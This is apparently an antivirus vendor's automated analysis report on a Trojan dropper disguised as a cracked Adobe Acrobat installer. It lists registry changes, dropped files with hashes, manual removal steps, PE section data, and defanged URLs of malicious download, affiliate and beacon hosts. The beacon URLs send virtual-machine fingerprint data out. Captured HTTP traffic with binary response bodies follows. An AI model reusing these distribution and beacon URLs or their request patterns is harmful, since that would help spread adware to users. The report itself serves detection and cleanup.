The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
ce4b14250ff2c67d88aea6a5dc084652 | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\583afdd9a9098[1].exe |
ce4b14250ff2c67d88aea6a5dc084652 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\G5wycqyxwV.exe |
c17103ae9072a06da581dec998343fc1 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\System.dll |
c498ae64b4971132bba676873978de1e | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\inetc.dll |
7caaf58a526da33c24cbe122e7839693 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll |
c2c978b4b608c45c6bf61d68cdedaa0e | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe |
fe25dac1837e5c2586e6ad6f00963925 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe |
89d40ecddf3ce6f3b0e6a84f40936912 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll |
53347df513f9fea942b17dc9fa94bda7 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe |
6903caeeb494cf008c1305199ffd2dc4 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Setup__2140_il2.exe:3044
sevensetup.exe:2608
583afdedde2bb_ua.exe:1576
cpSetup.exe:2892
G5wycqyxwV.exe:3900 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (9382 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7399 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8PAU9PHE.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PXLM8U2Q.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe (253391 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\normal_bg[1].jpg (1633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\appImg[1].jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spc_player.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe (52926 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4673.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe (58228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\1104817113 (871 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe (4705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\ItNP6AjIFY (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\G5wycqyxwV.exe (5293 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\583afdd9a9098[1].exe (3920 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\launch_reb[1].htm (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B (38534 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 233472 | 16944 | 17408 | 3.17675 | edad92707850619c3a3b7019022a50b3 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=10958132&pid=2735&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBNdWx0aWxpbmd1YWwgKyBDcmFjaw==&b_typ=pe | |
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack | |
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=2735&tid=10958132&b_typ=pe&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBN&reb=1&ic= | |
hxxp://dxfnfnjmewlvs.cloudfront.net/?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 | |
hxxp://di5k50sh3hqjp.cloudfront.net/get.php?ses=482796663418412224 | |
hxxp://will.ymuscaesnortin.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 52.222.174.20 |
hxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 52.49.84.66 |
hxxp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 52.222.174.20 |
hxxp://will.ymuscaesnortin.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 52.222.174.20 |
hxxp://ee.wintervenepest.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.88.21.193 |
hxxp://d2adi7hu49xk5t.cloudfront.net/normal_bg.jpg | 52.222.174.250 |
hxxp://d2adi7hu49xk5t.cloudfront.net/appImg.jpg | 52.222.174.250 |
hxxp://ee.wintervenepest.bid/report.php?typ=conversion&transId=139867460&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&s1=2735&s2=10958132&s3=&s4=&s5=1352224761&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.45457626983710575 | 54.88.21.193 |
hxxp://ee.wintervenepest.bid/report.php?typ=sys&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&transId=139867460&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.7188832209728342 | 54.88.21.193 |
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=cp&c=&step= | |
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M | |
hxxp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M | 104.18.41.31 |
hxxp://tobacted.info/?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3 | 104.27.139.167 |
hxxp://elja.linggyp.ru/9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye | |
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=rx&c=&step=1 | |
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png | |
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php | |
hxxp://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999 | 104.25.229.18 |
hxxp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999 | 54.88.152.23 |
hxxp://players.movinfra.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0 | |
hxxp://players.movinfra.com/css/twin.css | |
hxxp://e6845.dscb1.akamaiedge.net/crls/secureca.crl | |
hxxp://e8218.dscb1.akamaiedge.net/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg== | |
hxxp://clients.l.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T | |
hxxp://players.movinfra.com/js/main.js | |
hxxp://players.movinfra.com/css/fonts/font-awesome/fontawesome-webfont.eot? | |
hxxp://www-google-analytics.l.google.com/analytics.js | |
hxxp://clients.l.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz | |
hxxp://www-google-analytics.l.google.com/r/collect?v=1&_v=j47&a=561957627&t=pageview&_s=1&dl=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&dp=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&ul=en-us&de=utf-8&dt=EN Movie Player TWIN&sd=24-bit&sr=1916x902&vp=1173x539&je=1&fl=23.0 r0&_u=AEAAAEAAI~&jid=2066430644&cid=1439064958.1480261126&tid=UA-13179523-2&_r=1&z=2067671186 | |
hxxp://players.movinfra.com/img/favicon/cinemaden.com/favicon.ico | |
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png | 107.20.147.93 |
hxxp://wet.sodcattilyrem.bid/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M | 52.222.174.45 |
hxxp://tour.cinemaden.com/img/favicon/cinemaden.com/favicon.ico | 52.205.102.180 |
hxxp://www.secularistsarakolet.site/index.php | 107.20.147.93 |
hxxp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2735&tid=10958132&b_typ=pe&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBN&reb=1&ic= | 52.222.174.188 |
hxxp://get.gunnightmar.club/stats.php?bu=rx&c=&step=1 | 52.222.174.219 |
hxxp://away.yosauruslega.bid/get.php?ses=482796663418412224 | 52.222.174.149 |
hxxp://get.gunnightmar.club/stats.php?bu=cp&c=&step= | 52.222.174.219 |
hxxp://will.ymuscaesnortin.bidhxxp://will.ymuscaesnortin.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 52.222.174.20 |
hxxp://tour.cinemaden.com/css/fonts/font-awesome/fontawesome-webfont.eot? | 52.205.102.180 |
hxxp://www.google-analytics.com/r/collect?v=1&_v=j47&a=561957627&t=pageview&_s=1&dl=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&dp=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&ul=en-us&de=utf-8&dt=EN Movie Player TWIN&sd=24-bit&sr=1916x902&vp=1173x539&je=1&fl=23.0 r0&_u=AEAAAEAAI~&jid=2066430644&cid=1439064958.1480261126&tid=UA-13179523-2&_r=1&z=2067671186 | 173.194.32.135 |
hxxp://g.symcd.com/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg== | 23.43.139.27 |
hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz | 173.194.44.70 |
hxxp://will.ymuscaesnortin.bidhxxp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 52.222.174.20 |
hxxp://tour.cinemaden.com/js/main.js | 52.205.102.180 |
hxxp://crl.geotrust.com/crls/secureca.crl | 23.43.133.163 |
hxxp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0 | 52.205.102.180 |
hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T | 173.194.44.70 |
hxxp://tour.cinemaden.com/css/twin.css | 52.205.102.180 |
hxxp://www.google-analytics.com/analytics.js | 173.194.32.135 |
hxxp://off.ncongruousric.bid/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack | 52.222.174.55 |
hxxp://win.ketydesmidiana.bidhxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 52.49.84.66 |
hxxp://get.ercationiv.club/launch_reb.php?p=sevenzip&tid=10958132&pid=2735&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBNdWx0aWxpbmd1YWwgKyBDcmFjaw==&b_typ=pe | 52.222.174.100 |
hxxp://will.ymuscaesnortin.bidhxxp://will.ymuscaesnortin.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 52.222.174.20 |
hxxp://ee.wintervenepest.bidhxxp://ee.wintervenepest.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.88.21.193 |
hxxp://get.ynoptisticglob.bid/?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 | 52.222.174.190 |
ic-dc.deliverydlcenter.com | 52.222.174.140 |
ajax.googleapis.com | 74.125.205.95 |
fonts.googleapis.com | 173.194.222.95 |
fonts.gstatic.com | 74.125.232.255 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET hXXp://will.ymuscaesnortin.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: will.ymuscaesnortin.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Content-Length: 610
Connection: close
Location: hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 27 Nov 2016 15:37:20 GMT
X-Cache: Miss from cloudfront
Via: 1.1 05e6fd312b38836c9def63a422bd7429.cloudfront.net (CloudFront)
X-Amz-Cf-Id: vcKTRVplgIUTG_66QpD6lKWviTpBw1QE1sY0ZYnreDadUDujEcGOfA==
<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a></body>..
GET /analytics.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.google-analytics.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Timing-Allow-Origin: *
Date: Sun, 27 Nov 2016 14:38:31 GMT
Expires: Sun, 27 Nov 2016 16:38:31 GMT
Last-Modified: Wed, 28 Sep 2016 20:19:01 GMT
X-Content-Type-Options: nosniff
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 11590
Age: 3614
Cache-Control: public, max-age=7200
...........}iw..........tc.m'.a.i|B...F6 ...%.6.F.....o..JR/..{.....s'V..VK..J.W..Hz...=....S....=$......l.j.......d....?Q...-..K...j(FR..W].b._..V.Ea-.6u.......D..gF.....[.<..W...../............`z.....g.l..~.............>..........GB..N....?...?.I2.....U...o<.....W.;...x qq......J.......zC.q...?.<.....P.."..[.|.....\P.c...[8.......FB;/..#..N.........,.:..}.mw.....Bx..?...r=&`..,Q....)j.v..f3.._.y....<.}..........y.5..l...fk..E.B7].X....%. h...6m...J$O.......!=.P,..$qo.....]]..8g?....f..Oj......M..b4.$.T$...{...R..^......_.63T-.e..#h7Y.F..~..}..Q....\..Z.2KKO...on8..%.!.n.."V<Qo.j......0. .o{2..u(uU..M.8.E..FDs6.y.....7..\..g.....x4.7<.......yg.{f.....>.k/s..V..k....)....s)..@...$QC.7..\.P*I..uI.E.........U..7.<.]Wy.0.....]............*.2.[.0 @e.1....qXT._... .!8..IO..........L%..}.6.%.u6'"...."*.>.........[.U]..O.k.p.........C'QwI......*..~(..B.v.g...&.y...@.f....S.9..........<....8@........r..R..=.y.1..M....D...G..P..O..s.v)/[.....q.......e.s*.aE3"p[..J.[Xj<}.....u...^^.=.....u.....V....sR....Z......Uo....P\........M.!,L..v...[....'.hBd.n.....rr....c..@=.o.N..|A....C..-.D...ju....E.t....s.......p$.7.HT....S...!.4....]./.X.......C.C.[.X....~..B.d.../.e.4..O.r*q`.....d.....b...t........../^6.jg:B........'....x4...w;D...J1.._`.@].s...'*U....&.a.KFD....<.....Y@.7.?U..a...P..J.V..\%...O'].Q...[.7....Fn...0tgA.2S.#-....._..%....q......f..9...zZ...l==.R .@..v...."......[.....".".;..YBf....~.....m.$....d42?.9f..K@........7.Q_..w.<-...;z..|..*..>...D...(?r.....@F.. ..P]...2
<<< skipped >>>
GET /css/twin.css HTTP/1.1
Accept: text/css
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tour.cinemaden.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css
Date: Sun, 27 Nov 2016 15:38:42 GMT
ETag: W/"58372388-3b06f"
Last-Modified: Thu, 24 Nov 2016 17:29:44 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
transfer-encoding: chunked
Connection: keep-alive
7b54..............gs.J.(....v:&^......x... @....7xC8......M..D.......F.X*......'....rB......6....o..'.?.../.~.. .7.....;.............$...ed7u^V...%.Uy.K..^.R...../I.xY.......`8/...)..{^...~...?...?..(-..~i../.3.x..mU..<.@#ET}w..v.....4J....H...U....W.A.c........cx`....'.q...{.z.W^={$. #...<....r@......y....C......6"..dy....hl0./n.ZQ.....u......../nt..KUX.__..H.../..{......z.}.Q..._........__..#.....k.V..?........y......Z ....}q....]....*\.....(......l../g@..g...*...Z.n8....<..Uc.....P{.@..B.........wh..u....o.o......`......'.=P.x........N.....X......<.X.....:....U..3<bU..7........V..7^j{....f.'.....t.u.:...|.U.e.3..&(o...-.......3.U5ij..J...........`<........\...........G...Ov^.&...5...z....A.}.....f%..W.....Q .f%Q.p.`E&Q.......?}.......c.~...~..p..H...8....0'....o.7H.@.x.6.....V.%._...=.....l...S..l.p...7v.......:`......o@.=}|m.....oyl.....,}s.$...t..nh.~.,a.>.C..6......E.......$.)...V.-.c..".."s.Pu.dea.``."..y..........K...qc...e8.......A..v!..o.....*.$......H.m...q.~..w.^..koK....M5,........./..G.Zn~.X.....l./.__...#......`.G...C......x.g3..<..m]x....n&.......=.....}0..c........b....._n6.o/...2......o....(./.?c..z#.&...}.t.KA`....K...p.....a2............5r...G.({.....g$#..-Y.7....,...9.`.&.....;x.#~d..........7t.B.........:..z.. .../#.[;......k...e.. ..?.s.B...?>.:L?..?J.....my....{%......`.}.#`.U._....`z../.......?....0o2...m............]Y.9.E...=l..K..R./..g..g....a..8o......D........F"......h.....W..G.o........V..%..'i/.h~....`I........bX,_........@..)1~x3B~0C.,....F....S...<
<<< skipped >>>
GET /css/fonts/font-awesome/fontawesome-webfont.eot? HTTP/1.1
Accept: */*
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Origin: hXXp://tour.cinemaden.com
Accept-Encoding: gzip, deflate
Host: tour.cinemaden.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/vnd.ms-fontobject
Date: Sun, 27 Nov 2016 15:38:45 GMT
ETag: "57325088-10d0b"
Last-Modified: Tue, 10 May 2016 21:20:08 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 68875
Connection: keep-alive
